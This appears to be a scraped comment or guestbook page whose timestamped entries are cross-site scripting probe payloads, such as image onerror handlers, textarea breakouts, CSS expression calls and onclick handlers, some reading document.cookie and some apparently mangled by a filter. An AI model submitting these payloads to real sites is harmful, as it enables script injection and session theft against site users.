-
test
<body src=1 href=1 onerror="xjavascript:alert(1)"></body> (2021.12.24 23:16)
-
test
<h1>hello</h1> (2021.12.24 23:20)
-
test
“/>.<<img src=x onerror=alert(1)//\">><> (2021.12.24 23:21)
-
ttt
“>><<img src=x onerror=alert(1);//>> (2021.12.24 23:22)
-
">alert(1)
</textarea><img src=1 onerror=prompt("yes")/> (2021.12.25 16:23)
-
hi">

"/> <img src="xjavascript:alert(1)"> <img \x00src=x onerror="alert(1)"> <div style="font-family:foo}color=red;">XXX (2021.12.25 16:56)
-
hi"

hi"/><img src="ex"/> <xscript>alert(document.cookie)/script> (2021.12.25 16:59)
-
this is vuln
</font><font style='color:expression(alert(document.cookie))'> (2021.12.25 17:07)
-
Clickable
Clickable</font><img src=example2 onerror=alert("XSS")/>
<font onclick="alert(1)">test</font> (2021.12.25 17:10)